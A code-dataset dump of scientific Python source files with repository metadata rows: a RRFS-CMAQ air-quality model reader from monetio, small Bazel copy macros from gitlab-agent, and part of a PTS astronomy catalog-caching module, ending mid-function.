names.append(mod_name)
leaves.append(mod)
handled.add(mod_name)
return names, leaves
| 23.96875 | 74 | 0.65189 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 | 0.007823 |
5fc75bc9dcba17efcc6fbd5b1c74a679be2c870d | 32,615 | py | Python | monetio/models/_rrfs_cmaq_mm.py | zmoon/monetio | c8326750fa5d2404ccec726a5088f9a0e7fd4c4a | [
"MIT"
] | 1 | 2022-02-18T22:49:23.000Z | 2022-02-18T22:49:23.000Z | monetio/models/_rrfs_cmaq_mm.py | zmoon/monetio | c8326750fa5d2404ccec726a5088f9a0e7fd4c4a | [
"MIT"
] | null | null | null | monetio/models/_rrfs_cmaq_mm.py | zmoon/monetio | c8326750fa5d2404ccec726a5088f9a0e7fd4c4a | [
"MIT"
] | 1 | 2022-02-04T19:09:32.000Z | 2022-02-04T19:09:32.000Z | """ RRFS-CMAQ File Reader """
import numpy as np
import xarray as xr
from numpy import concatenate
from pandas import Series
def can_do(index):
if index.max():
return True
else:
return False
def open_mfdataset(
fname,
convert_to_ppb=True,
mech="cb6r3_ae6_aq",
var_list=None,
fname_pm25=None,
surf_only=False,
**kwargs
):
# Like WRF-chem add var list that just determines whether to calculate sums or not to speed this up.
"""Method to open RFFS-CMAQ dyn* netcdf files.
Parameters
----------
fname : string or list
fname is the path to the file or files. It will accept hot keys in
strings as well.
convert_to_ppb : boolean
If true the units of the gas species will be converted to ppbv
mech: str
Mechanism to be used for calculating sums. Mechanisms supported:
"cb6r3_ae6_aq"
var_list: list
List of variables to include in output. MELODIES-MONET only reads in
variables need to plot in order to save on memory and simulation cost
especially for vertical data. If None, will read in all model data and
calculate all sums.
fname_pm25: string or list
Optional path to the file or files for precalculated PM2.5 sums. It
will accept hot keys in strings as well.
surf_only: boolean
Whether to save only surface data to save on memory and computational
cost (True) or not (False).
Returns
-------
xarray.DataSet
RRFS-CMAQ model dataset in standard format for use in MELODIES-MONET
"""
# Get dictionary of summed species for the mechanism of choice.
dict_sum = dict_species_sums(mech=mech)
if var_list is not None:
# Read in only a subset of variables and only do calculations if needed.
var_list_orig = var_list.copy() # Keep track of the original list before changes.
list_calc_sum = []
list_remove_extra = [] # list of variables to remove after the sum to save in memory.
for var_sum in [
"PM25",
"PM10",
"noy_gas",
"noy_aer",
"nox",
"pm25_cl",
"pm25_ec",
"pm25_ca",
"pm25_na",
"pm25_nh4",
"pm25_no3",
"pm25_so4",
"pm25_om",
]:
if var_sum in var_list:
if var_sum == "PM25":
var_list.extend(dict_sum["aitken"])
var_list.extend(dict_sum["accumulation"])
var_list.extend(dict_sum["coarse"])
# Keep track to remove these later too
list_remove_extra.extend(dict_sum["aitken"])
list_remove_extra.extend(dict_sum["accumulation"])
list_remove_extra.extend(dict_sum["coarse"])
elif var_sum == "PM10":
var_list.extend(dict_sum["aitken"])
var_list.extend(dict_sum["accumulation"])
var_list.extend(dict_sum["coarse"])
# Keep track to remove these later too
list_remove_extra.extend(dict_sum["aitken"])
list_remove_extra.extend(dict_sum["accumulation"])
list_remove_extra.extend(dict_sum["coarse"])
else:
var_list.extend(dict_sum[var_sum])
# Keep track to remove these later too
list_remove_extra.extend(dict_sum[var_sum])
var_list.remove(var_sum)
list_calc_sum.append(var_sum)
# append the other needed species.
var_list.append("lat")
var_list.append("lon")
var_list.append("phalf")
var_list.append("tmp")
var_list.append("pressfc")
var_list.append("dpres")
var_list.append("hgtsfc")
var_list.append("delz")
# Remove duplicates just in case:
var_list = list(dict.fromkeys(var_list))
list_remove_extra = list(dict.fromkeys(list_remove_extra))
# Select only those elements in list_remove_extra that are not in var_list_orig
list_remove_extra_only = list(set(list_remove_extra) - set(var_list_orig))
# If variables in pm25 files are included remove these as these are not in the main file
# And will be added later.
for pm25_var in [
"PM25_TOT",
"PM25_TOT_NSOM",
"PM25_EC",
"PM25_NH4",
"PM25_NO3",
"PM25_SO4",
"PM25_OC",
"PM25_OM",
]:
if pm25_var in var_list:
var_list.remove(pm25_var)
# open the dataset using xarray
dset = xr.open_mfdataset(fname, concat_dim="time", combine="nested", **kwargs)[var_list]
else:
# Read in all variables and do all calculations.
dset = xr.open_mfdataset(fname, concat_dim="time", combine="nested", **kwargs)
list_calc_sum = [
"PM25",
"PM10",
"noy_gas",
"noy_aer",
"nox",
"pm25_cl",
"pm25_ec",
"pm25_ca",
"pm25_na",
"pm25_nh4",
"pm25_no3",
"pm25_so4",
"pm25_om",
]
if fname_pm25 is not None:
# Add the processed pm2.5 species.
dset_pm25 = xr.open_mfdataset(fname_pm25, concat_dim="time", combine="nested", **kwargs)
dset_pm25 = dset_pm25.drop(
labels=["lat", "lon", "pfull"]
) # Drop duplicate variables so can merge.
# Slight differences in pfull value between the files, but I assume that these still represent the
# same pressure levels from the model dynf* files.
# Attributes are formatted differently in pm25 file so remove attributes and use those from dynf* files.
dset_pm25.attrs = {}
dset = dset.merge(dset_pm25)
# Standardize some variable names
dset = dset.rename(
{
"grid_yt": "y",
"grid_xt": "x",
"pfull": "z",
"phalf": "z_i", # Interface pressure levels
"lon": "longitude",
"lat": "latitude",
"tmp": "temperature_k", # standard temperature (kelvin)
"pressfc": "surfpres_pa",
"dpres": "dp_pa", # Change names so standard surfpres_pa and dp_pa
"hgtsfc": "surfalt_m",
"delz": "dz_m",
}
) # Optional, but when available include altitude info
# Calculate pressure. This has to go before sorting because ak and bk
# are not sorted as they are in attributes
dset["pres_pa_mid"] = _calc_pressure(dset)
# Adjust pressure levels for all models such that the surface is first.
dset = dset.sortby("z", ascending=False)
dset = dset.sortby("z_i", ascending=False)
# Note this altitude calcs needs to always go after resorting.
# Altitude calculations are all optional, but for each model add values that are easy to calculate.
dset["alt_msl_m_full"] = _calc_hgt(dset)
dset["dz_m"] = dset["dz_m"] * -1.0 # Change to positive values.
# Set coordinates
dset = dset.reset_index(
["x", "y", "z", "z_i"], drop=True
) # For now drop z_i no variables use it.
dset["latitude"] = dset["latitude"].isel(time=0)
dset["longitude"] = dset["longitude"].isel(time=0)
dset = dset.reset_coords()
dset = dset.set_coords(["latitude", "longitude"])
# These sums and units are quite expensive and memory intensive,
# so add option to shrink dataset to just surface when needed
if surf_only:
dset = dset.isel(z=0).expand_dims("z", axis=1)
# Need to adjust units before summing for aerosols
# convert all gas species to ppbv
if convert_to_ppb:
for i in dset.variables:
if "units" in dset[i].attrs:
if "ppmv" in dset[i].attrs["units"]:
dset[i] *= 1000.0
dset[i].attrs["units"] = "ppbv"
# convert "ug/kg to ug/m3"
for i in dset.variables:
if "units" in dset[i].attrs:
if "ug/kg" in dset[i].attrs["units"]:
# ug/kg -> ug/m3 using dry air density
dset[i] = dset[i] * dset["pres_pa_mid"] / dset["temperature_k"] / 287.05535
dset[i].attrs["units"] = r"$\mu g m^{-3}$"
# add lazy diagnostic variables
# Note that because there are so many species to sum. Summing the aerosols is slowing down the code.
if "PM25" in list_calc_sum:
dset = add_lazy_pm25(dset, dict_sum)
if "PM10" in list_calc_sum:
dset = add_lazy_pm10(dset, dict_sum)
if "noy_gas" in list_calc_sum:
dset = add_lazy_noy_g(dset, dict_sum)
if "noy_aer" in list_calc_sum:
dset = add_lazy_noy_a(dset, dict_sum)
if "nox" in list_calc_sum:
dset = add_lazy_nox(dset, dict_sum)
if "pm25_cl" in list_calc_sum:
dset = add_lazy_cl_pm25(dset, dict_sum)
if "pm25_ec" in list_calc_sum:
dset = add_lazy_ec_pm25(dset, dict_sum)
if "pm25_ca" in list_calc_sum:
dset = add_lazy_ca_pm25(dset, dict_sum)
if "pm25_na" in list_calc_sum:
dset = add_lazy_na_pm25(dset, dict_sum)
if "pm25_nh4" in list_calc_sum:
dset = add_lazy_nh4_pm25(dset, dict_sum)
if "pm25_no3" in list_calc_sum:
dset = add_lazy_no3_pm25(dset, dict_sum)
if "pm25_so4" in list_calc_sum:
dset = add_lazy_so4_pm25(dset, dict_sum)
if "pm25_om" in list_calc_sum:
dset = add_lazy_om_pm25(dset, dict_sum)
# Change the times to pandas format
dset["time"] = dset.indexes["time"].to_datetimeindex(unsafe=True)
# Turn off warning for now. This is just because the model is in julian time
# Drop extra variables that were part of sum, but are not in original var_list
# to save memory and computational time.
# This is only revevant if var_list is provided
if var_list is not None:
if bool(list_remove_extra_only): # confirm list not empty
dset = dset.drop_vars(list_remove_extra_only)
return dset
def _get_keys(d):
"""Calculates keys
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
list
list of keys
"""
keys = Series([i for i in d.data_vars.keys()])
return keys
def add_lazy_pm25(d, dict_sum):
"""Calculates PM2.5 sum. 20% of coarse mode is included in PM2.5 sum.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new PM2.5 calculation
"""
keys = _get_keys(d)
allvars = Series(
concatenate([dict_sum["aitken"], dict_sum["accumulation"], dict_sum["coarse"]])
)
weights = Series(
concatenate(
[
np.ones(len(dict_sum["aitken"])),
np.ones(len(dict_sum["accumulation"])),
np.full(len(dict_sum["coarse"]), 0.2),
]
)
)
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
newweights = weights.loc[index]
d["PM25"] = add_multiple_lazy2(d, newkeys, weights=newweights)
d["PM25"] = d["PM25"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "PM2.5",
"long_name": "PM2.5 calculated by MONET assuming coarse mode 20%",
}
)
return d
def add_lazy_pm10(d, dict_sum):
"""Calculates PM10 sum.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new PM10 calculation
"""
keys = _get_keys(d)
allvars = Series(
concatenate([dict_sum["aitken"], dict_sum["accumulation"], dict_sum["coarse"]])
)
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
d["PM10"] = add_multiple_lazy2(d, newkeys)
d["PM10"] = d["PM10"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "PM10",
"long_name": "Particulate Matter < 10 microns",
}
)
return d
def add_lazy_noy_g(d, dict_sum):
"""Calculates NOy gas
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new NOy gas calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["noy_gas"])
weights = Series(dict_sum["noy_gas_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
newweights = weights.loc[index]
d["noy_gas"] = add_multiple_lazy2(d, newkeys, weights=newweights)
d["noy_gas"] = d["noy_gas"].assign_attrs({"name": "noy_gas", "long_name": "NOy gases"})
return d
def add_lazy_noy_a(d, dict_sum):
"""Calculates NOy aerosol
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new NOy aerosol calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["noy_aer"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
d["noy_aer"] = add_multiple_lazy2(d, newkeys)
d["noy_aer"] = d["noy_aer"].assign_attrs(
{"units": r"$\mu g m^{-3}$", "name": "noy_aer", "long_name": "NOy aerosol"}
)
return d
def add_lazy_nox(d, dict_sum):
"""Calculates NOx
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new NOx calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["nox"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
d["nox"] = add_multiple_lazy2(d, newkeys)
d["nox"] = d["nox"].assign_attrs({"name": "nox", "long_name": "nox"})
return d
def add_lazy_cl_pm25(d, dict_sum):
"""Calculates sum of particulate Cl.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new CLf calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_cl"])
weights = Series(dict_sum["pm25_cl_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
neww = weights.loc[index]
d["pm25_cl"] = add_multiple_lazy2(d, newkeys, weights=neww)
d["pm25_cl"] = d["pm25_cl"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "pm25_cl",
"long_name": "PM2.5 CL assuming coarse mode 20%",
}
)
return d
def add_lazy_ec_pm25(d, dict_sum):
"""Calculates sum of particulate EC.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new EC calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_ec"])
weights = Series(dict_sum["pm25_ec_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
neww = weights.loc[index]
d["pm25_ec"] = add_multiple_lazy2(d, newkeys, weights=neww)
d["pm25_ec"] = d["pm25_ec"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "pm25_ec",
"long_name": "PM2.5 EC assuming coarse mode 20%",
}
)
return d
def add_lazy_ca_pm25(d, dict_sum):
"""Calculates sum of particulate CA.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new CA calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_ca"])
weights = Series(dict_sum["pm25_ca_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
neww = weights.loc[index]
d["pm25_ca"] = add_multiple_lazy2(d, newkeys, weights=neww)
d["pm25_ca"] = d["pm25_ca"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "pm25_ca",
"long_name": "PM2.5 CA assuming coarse mode 20%",
}
)
return d
def add_lazy_na_pm25(d, dict_sum):
"""Calculates sum of particulate NA.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new NA calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_na"])
weights = Series(dict_sum["pm25_na_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
neww = weights.loc[index]
d["pm25_na"] = add_multiple_lazy2(d, newkeys, weights=neww)
d["pm25_na"] = d["pm25_na"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "pm25_na",
"long_name": "PM2.5 NA assuming coarse mode 20%",
}
)
return d
def add_lazy_nh4_pm25(d, dict_sum):
"""Calculates sum of particulate NH4.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new NH4 calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_nh4"])
weights = Series(dict_sum["pm25_nh4_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
neww = weights.loc[index]
d["pm25_nh4"] = add_multiple_lazy2(d, newkeys, weights=neww)
d["pm25_nh4"] = d["pm25_nh4"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "pm25_nh4",
"long_name": "PM2.5 NH4 assuming coarse mode 20%",
}
)
return d
def add_lazy_no3_pm25(d, dict_sum):
"""Calculates sum of particulate NO3.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new NO3 calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_no3"])
weights = Series(dict_sum["pm25_no3_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
neww = weights.loc[index]
d["pm25_no3"] = add_multiple_lazy2(d, newkeys, weights=neww)
d["pm25_no3"] = d["pm25_no3"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "pm25_no3",
"long_name": "PM2.5 NO3 assuming coarse mode 20%",
}
)
return d
def add_lazy_so4_pm25(d, dict_sum):
"""Calculates sum of particulate SO4.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new SO4 calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_so4"])
weights = Series(dict_sum["pm25_so4_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
neww = weights.loc[index]
d["pm25_so4"] = add_multiple_lazy2(d, newkeys, weights=neww)
d["pm25_so4"] = d["pm25_so4"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "pm25_so4",
"long_name": "PM2.5 SO4 assuming coarse mode 20%",
}
)
return d
def add_lazy_om_pm25(d, dict_sum):
"""Calculates sum of particulate OM.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new OM calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_om"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
d["pm25_om"] = add_multiple_lazy2(d, newkeys)
d["pm25_om"] = d["pm25_om"].assign_attrs(
{"units": r"$\mu g m^{-3}$", "name": "pm25_om", "long_name": "PM2.5 OM"}
)
return d
def add_multiple_lazy(dset, variables, weights=None):
"""Sums variables
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
variables : series
series of variables
variables : series
series of weights to apply to each variable during the sum
Returns
-------
xarray.Dataarray
Weighted sum of all specified variables
"""
from numpy import ones
if weights is None:
weights = ones(len(variables))
else:
weights = weights.values
variables = variables.values
new = dset[variables[0]].copy() * weights[0]
for i, j in zip(variables[1:], weights[1:]):
new = new + dset[i] * j
return new
def add_multiple_lazy2(dset, variables, weights=None):
"""Sums variables. This is similar to add_multiple_lazy, but is a little
faster.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
variables : series
series of variables
variables : series
series of weights to apply to each variable during the sum
Returns
-------
xarray.Dataarray
Weighted sum of all specified variables
"""
dset2 = dset[variables.values]
if weights is not None:
for i, j in zip(variables.values, weights.values):
dset2[i] = dset2[i] * j
new = dset2.to_array().sum("variable")
return new
def _predefined_mapping_tables(dset):
"""Predefined mapping tables for different observational parings used when
combining data.
Returns
-------
dictionary
dictionary defining default mapping tables
"""
to_improve = {}
to_nadp = {}
to_aqs = {
"OZONE": ["o3"],
"PM2.5": ["PM25"],
"CO": ["co"],
"NOY": ["NOy"],
"NOX": ["NOx"],
"SO2": ["so2"],
"NO": ["no"],
"NO2": ["no2"],
}
to_airnow = {
"OZONE": ["o3"],
"PM2.5": ["PM25"],
"CO": ["co"],
"NOY": ["NOy"],
"NOX": ["NOx"],
"SO2": ["so2"],
"NO": ["no"],
"NO2": ["no2"],
}
to_crn = {}
to_aeronet = {}
to_cems = {}
mapping_tables = {
"improve": to_improve,
"aqs": to_aqs,
"airnow": to_airnow,
"crn": to_crn,
"cems": to_cems,
"nadp": to_nadp,
"aeronet": to_aeronet,
}
dset = dset.assign_attrs({"mapping_tables": mapping_tables})
return dset
# For the different mechanisms, just update these arrays as needed.
def dict_species_sums(mech):
"""Predefined mapping tables for different observational parings used when
combining data.
Parameters
----------
mech : string
mechanism name
Returns
-------
dictionary
dictionary defining the variables to sum based on the specified mechanism
"""
if mech == "cb6r3_ae6_aq":
sum_dict = {}
# Arrays for different gasses and pm groupings
sum_dict.update(
{
"accumulation": [
"aso4j",
"ano3j",
"anh4j",
"anaj",
"aclj",
"aecj",
"aothrj",
"afej",
"asij",
"atij",
"acaj",
"amgj",
"amnj",
"aalj",
"akj",
"alvpo1j",
"asvpo1j",
"asvpo2j",
"asvpo3j",
"aivpo1j",
"axyl1j",
"axyl2j",
"axyl3j",
"atol1j",
"atol2j",
"atol3j",
"abnz1j",
"abnz2j",
"abnz3j",
"aiso1j",
"aiso2j",
"aiso3j",
"atrp1j",
"atrp2j",
"asqtj",
"aalk1j",
"aalk2j",
"apah1j",
"apah2j",
"apah3j",
"aorgcj",
"aolgbj",
"aolgaj",
"alvoo1j",
"alvoo2j",
"asvoo1j",
"asvoo2j",
"asvoo3j",
"apcsoj",
]
}
)
sum_dict.update(
{
"accumulation_wopc": [
"aso4j",
"ano3j",
"anh4j",
"anaj",
"aclj",
"aecj",
"aothrj",
"afej",
"asij",
"atij",
"acaj",
"amgj",
"amnj",
"aalj",
"akj",
"alvpo1j",
"asvpo1j",
"asvpo2j",
"asvpo3j",
"aivpo1j",
"axyl1j",
"axyl2j",
"axyl3j",
"atol1j",
"atol2j",
"atol3j",
"abnz1j",
"abnz2j",
"abnz3j",
"aiso1j",
"aiso2j",
"aiso3j",
"atrp1j",
"atrp2j",
"asqtj",
"aalk1j",
"aalk2j",
"apah1j",
"apah2j",
"apah3j",
"aorgcj",
"aolgbj",
"aolgaj",
"alvoo1j",
"alvoo2j",
"asvoo1j",
"asvoo2j",
"asvoo3j",
]
}
)
sum_dict.update(
{
"aitken": [
"aso4i",
"ano3i",
"anh4i",
"anai",
"acli",
"aeci",
"aothri",
"alvpo1i",
"asvpo1i",
"asvpo2i",
"alvoo1i",
"alvoo2i",
"asvoo1i",
"asvoo2i",
]
}
)
sum_dict.update(
{"coarse": ["asoil", "acors", "aseacat", "aclk", "aso4k", "ano3k", "anh4k"]}
)
sum_dict.update(
{
"noy_gas": [
"no",
"no2",
"no3",
"n2o5",
"hono",
"hno3",
"pna",
"cron",
"clno2",
"pan",
"panx",
"opan",
"ntr1",
"ntr2",
"intr",
]
}
)
sum_dict.update({"noy_gas_weight": [1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]})
sum_dict.update(
{"noy_aer": ["ano3i", "ano3j", "ano3k"]}
) # Need to confirm here if there is a size cutoff for noy obs?
sum_dict.update({"nox": ["no", "no2"]})
sum_dict.update({"pm25_cl": ["acli", "aclj", "aclk"]})
sum_dict.update({"pm25_cl_weight": [1, 1, 0.2]})
sum_dict.update({"pm25_ec": ["aeci", "aecj"]})
sum_dict.update({"pm25_ec_weight": [1, 1]})
sum_dict.update({"pm25_na": ["anai", "anaj", "aseacat", "asoil", "acors"]})
sum_dict.update({"pm25_na_weight": [1, 1, 0.2 * 0.8373, 0.2 * 0.0626, 0.2 * 0.0023]})
sum_dict.update({"pm25_ca": ["acaj", "aseacat", "asoil", "acors"]})
sum_dict.update({"pm25_ca_weight": [1, 0.2 * 0.0320, 0.2 * 0.0838, 0.2 * 0.0562]})
sum_dict.update({"pm25_nh4": ["anh4i", "anh4j", "anh4k"]})
sum_dict.update({"pm25_nh4_weight": [1, 1, 0.2]})
sum_dict.update({"pm25_no3": ["ano3i", "ano3j", "ano3k"]})
sum_dict.update({"pm25_no3_weight": [1, 1, 0.2]})
sum_dict.update({"pm25_so4": ["aso4i", "aso4j", "aso4k"]})
sum_dict.update({"pm25_so4_weight": [1, 1, 0.2]})
sum_dict.update(
{
"pm25_om": [
"alvpo1i",
"asvpo1i",
"asvpo2i",
"alvoo1i",
"alvoo2i",
"asvoo1i",
"asvoo2i",
"alvpo1j",
"asvpo1j",
"asvpo2j",
"asvpo3j",
"aivpo1j",
"axyl1j",
"axyl2j",
"axyl3j",
"atol1j",
"atol2j",
"atol3j",
"abnz1j",
"abnz2j",
"abnz3j",
"aiso1j",
"aiso2j",
"aiso3j",
"atrp1j",
"atrp2j",
"asqtj",
"aalk1j",
"aalk2j",
"apah1j",
"apah2j",
"apah3j",
"aorgcj",
"aolgbj",
"aolgaj",
"alvoo1j",
"alvoo2j",
"asvoo1j",
"asvoo2j",
"asvoo3j",
"apcsoj",
]
}
)
else:
raise NotImplementedError(
"Mechanism not supported, update _rrfs_cmaq_mm.py file in MONETIO"
)
return sum_dict
def _calc_hgt(f):
"""Calculates the geopotential height in m from the variables hgtsfc and
delz. Note: To use this function the delz value needs to go from surface
to top of atmosphere in vertical. Because we are adding the height of
each grid box these are really grid top values
Parameters
----------
f : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xr.DataArray
Geoptential height with attributes.
"""
sfc = f.surfalt_m.load()
dz = f.dz_m.load() * -1.0
# These are negative in RRFS-CMAQ, but you resorted and are adding from the surface,
# so make them positive.
dz[:, 0, :, :] = dz[:, 0, :, :] + sfc # Add the surface altitude to the first model level only
z = dz.rolling(z=len(f.z), min_periods=1).sum()
z.name = "alt_msl_m_full"
z.attrs["long_name"] = "Altitude MSL Full Layer in Meters"
z.attrs["units"] = "m"
return z
def _calc_pressure(dset):
"""Calculate the mid-layer pressure in Pa from surface pressure
and ak and bk constants.
Interface pressures are calculated by:
phalf(k) = a(k) + surfpres * b(k)
Mid layer pressures are calculated by:
pfull(k) = (phalf(k+1)-phalf(k))/log(phalf(k+1)/phalf(k))
Parameters
----------
dset : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.DataArray
Mid-layer pressure with attributes.
"""
pres = dset.dp_pa.copy().load() # Have to load into memory here so can assign levels.
srfpres = dset.surfpres_pa.copy().load()
for k in range(len(dset.z)):
pres_2 = dset.ak[k + 1] + srfpres * dset.bk[k + 1]
pres_1 = dset.ak[k] + srfpres * dset.bk[k]
pres[:, k, :, :] = (pres_2 - pres_1) / np.log(pres_2 / pres_1)
pres.name = "pres_pa_mid"
pres.attrs["units"] = "pa"
pres.attrs["long_name"] = "Pressure Mid Layer in Pa"
return pres
| 29.569356 | 112 | 0.508079 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 14,252 | 0.436977 |
5fc818c5836435c92ae4ef2d17b3e1e01d7c0fde | 816 | bzl | Python | build/build.bzl | abaer123/gitlab-agent | 71c94d781ae2a7ae2851bb946c37fe01b1ed3da0 | [
"MIT"
] | null | null | null | build/build.bzl | abaer123/gitlab-agent | 71c94d781ae2a7ae2851bb946c37fe01b1ed3da0 | [
"MIT"
] | null | null | null | build/build.bzl | abaer123/gitlab-agent | 71c94d781ae2a7ae2851bb946c37fe01b1ed3da0 | [
"MIT"
] | null | null | null | load("@com_github_atlassian_bazel_tools//multirun:def.bzl", "command")
load("@bazel_skylib//lib:shell.bzl", "shell")
def copy_to_workspace(name, label, file_to_copy, workspace_relative_target_directory):
command(
name = name,
command = "//build:copy_to_workspace",
data = [label],
arguments = ["$(rootpaths %s)" % label, file_to_copy, workspace_relative_target_directory],
visibility = ["//visibility:public"],
)
# This macro expects target directory for the file as an additional command line argument.
def copy_absolute(name, label, file_to_copy):
command(
name = name,
command = "//build:copy_absolute",
data = [label],
arguments = ["$(rootpaths %s)" % label, file_to_copy],
visibility = ["//visibility:public"],
)
| 37.090909 | 99 | 0.658088 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 315 | 0.386029 |
5fc9836cfddecb88f1956951f281f1c8d40b8f81 | 4,471 | py | Python | CAAPR/CAAPR_AstroMagic/PTS/pts/magic/catalog/catalog.py | wdobbels/CAAPR | 50d0b32642a61af614c22f1c6dc3c4a00a1e71a3 | [
"MIT"
] | 7 | 2016-05-20T21:56:39.000Z | 2022-02-07T21:09:48.000Z | CAAPR/CAAPR_AstroMagic/PTS/pts/magic/catalog/catalog.py | wdobbels/CAAPR | 50d0b32642a61af614c22f1c6dc3c4a00a1e71a3 | [
"MIT"
] | 1 | 2019-03-21T16:10:04.000Z | 2019-03-22T17:21:56.000Z | CAAPR/CAAPR_AstroMagic/PTS/pts/magic/catalog/catalog.py | wdobbels/CAAPR | 50d0b32642a61af614c22f1c6dc3c4a00a1e71a3 | [
"MIT"
] | 1 | 2020-05-19T16:17:17.000Z | 2020-05-19T16:17:17.000Z | #!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.magic.catalog.catalog Contains the GalacticCatalog and StellarCatalog classes.
# -----------------------------------------------------------------
# Ensure Python 3 functionality
from __future__ import absolute_import, division, print_function
# Import the relevant PTS classes and modules
from ..tools import catalogs
from ...core.tools import introspection, tables
from ...core.tools import filesystem as fs
# -----------------------------------------------------------------
catalogs_user_path = fs.join(introspection.pts_user_dir, "catalogs")
# -----------------------------------------------------------------
class GalacticCatalog(object):
"""
This class ...
"""
def __init__(self, frame_or_wcs):
"""
The constructor ...
:param frame_or_wcs:
:return:
"""
# Create the catalogs user directory if necessary
if not fs.is_directory(catalogs_user_path): fs.create_directory(catalogs_user_path)
# Determine the path to the 'galaxies' catalog path
galaxies_catalog_path = fs.join(catalogs_user_path, "galaxies")
# Create the catalogs/galaxies directory is necessary
if not fs.is_directory(galaxies_catalog_path): fs.create_directory(galaxies_catalog_path)
# Get the center coordinate and the range of RA and DEC
center, ra_span, dec_span = frame_or_wcs.coordinate_range
# Generate a unique string for the coordinate range
name = str(center) + "_" + str(ra_span) + "_" + str(dec_span)
# Determine the path to the catalog file
self.path = fs.join(galaxies_catalog_path, name + ".cat")
# Check whether the local file exists
if not fs.is_file(self.path):
# Get the table
self.table = catalogs.create_galaxy_catalog(frame_or_wcs)
# Save the table
tables.write(self.table, self.path, format="ascii.ecsv")
# Load the table
else: self.table = tables.from_file(self.path, format="ascii.ecsv")
# -----------------------------------------------------------------
def saveto(self, path):
"""
This function ...
:param path:
:return:
"""
tables.write(self.table, path, format="ascii.ecsv")
# -----------------------------------------------------------------
class StellarCatalog(object):
"""
This class ...
"""
def __init__(self, frame_or_wcs, catalog_names="II/246"):
"""
This function ...
:param frame_or_wcs:
:param catalog_names:
:return:
"""
# Create the catalogs user directory if necessary
if not fs.is_directory(catalogs_user_path): fs.create_directory(catalogs_user_path)
# Determine the path to the 'galaxies' catalog path
stars_catalog_path = fs.join(catalogs_user_path, "stars")
# Create the catalogs/stars directory is necessary
if not fs.is_directory(stars_catalog_path): fs.create_directory(stars_catalog_path)
# Get the center coordinate and the range of RA and DEC
center, ra_span, dec_span = frame_or_wcs.coordinate_range
# Generate a unique string for the coordinate range
